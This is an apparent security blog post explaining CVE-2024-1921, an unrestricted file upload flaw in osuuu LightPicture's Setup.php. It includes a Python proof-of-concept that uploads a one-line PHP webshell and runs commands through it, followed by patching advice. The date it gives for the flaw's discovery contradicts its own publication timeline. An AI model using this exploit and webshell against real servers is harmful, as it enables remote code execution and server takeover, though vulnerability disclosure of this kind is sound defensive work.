On March 26, 2024, a critical vulnerability identified as CVE-2024-1921 (also tracked as VDB-254856) was discovered in the *osuuu LightPicture* image management software, affecting versions up to 1.2.2. The security issue lies in the /app/controller/Setup.php file, where improper file validation allows an attacker to upload arbitrary files—including malicious PHP scripts. This can result in remote code execution (RCE), completely compromising the vulnerable server.
In this article, we’ll break down how CVE-2024-1921 works, provide a simple PoC exploit example, and discuss how to protect your systems. We will also share links to original references for community and developer response.
What Is osuuu LightPicture?
osuuu LightPicture is an open-source, lightweight image management and gallery tool, often deployed on personal and small business web servers. It offers ease of use and quick deployment, which makes it popular—but also attractive to attackers seeking vulnerabilities.
What Went Wrong? (The Vulnerability Details)
In versions up to 1.2.2, LightPicture’s Setup.php controller does not properly validate or restrict files uploaded during initial setup or image placement actions. This means a user can upload *any* file type, including server-executable scripts like .php. This is referred to as an "unrestricted file upload" vulnerability.
Here is the National Vulnerability Database entry (NVD) and the VulDB entry for the bug.
Exploit Scenario
A remote attacker can craft a POST request that uploads a PHP webshell disguised as a harmless image. The webshell is placed in a web-accessible folder, and once uploaded, the attacker can execute arbitrary commands on the web server.
Exploit in Simple Steps
- Send an HTTP POST request to /app/controller/Setup.php with a malicious file.
Example Code Snippet: Exploit Proof of Concept
Below is a Python 3 script demonstrating how attackers can leverage this vulnerability.
import requests
# Replace these with the actual target details
target = "http://victim.com";
upload_url = f"{target}/app/controller/Setup.php"
# Malicious PHP webshell disguised as image
webshell = {
'file': ('shell.php', '<?php echo shell_exec($_GET["cmd"]); ?>', 'application/x-php')
}
# Send the upload request (attacker's exploit)
response = requests.post(upload_url, files=webshell)
if response.status_code == 200:
print("[+] Shell uploaded!")
# Assume shell is accessible at a known location, e.g. /uploads/shell.php
shell_url = f"{target}/uploads/shell.php?cmd=whoami"
exec_response = requests.get(shell_url)
print("[+] Command output:")
print(exec_response.text)
else:
print("[-] Upload failed.")
Note: This example assumes the file is placed in an uploads/ folder. Real paths may differ per LightPicture deployment.
Original References
- NVD entry for CVE-2024-1921
- VulDB advisory VDB-254856
- osuuu LightPicture GitHub repository
If you use osuuu LightPicture versions up to 1.2.2, you are at risk! Here’s what you should do
- Update Immediately: If a patched version is available from the GitHub repo, upgrade ASAP.
- Restrict File Types: Patch your own code to limit uploads to image file types and verify MIME types server-side.
Validate User Access: Make sure file upload features require authentication.
- Check File Permissions: Uploaded files should be saved outside web-accessible folders, or execute permission should be blocked.
Conclusion
CVE-2024-1921 in osuuu LightPicture is a serious security hole, allowing attackers to upload any file to the server, potentially gaining full control remotely. This type of vulnerability is a common entry point for web-based attacks.
If you run LightPicture (or any PHP upload system), act now—patch the code, restrict file uploads, and stay alert for suspicious activity.
Stay safe, patch early!
*This post is an exclusive, plain-language summary for users seeking clear understanding and immediate steps for CVE-2024-1921. For further reading, check the links above.*
Timeline
Published on: 02/27/2024 15:15:07 UTC
Last modified on: 02/29/2024 01:43:56 UTC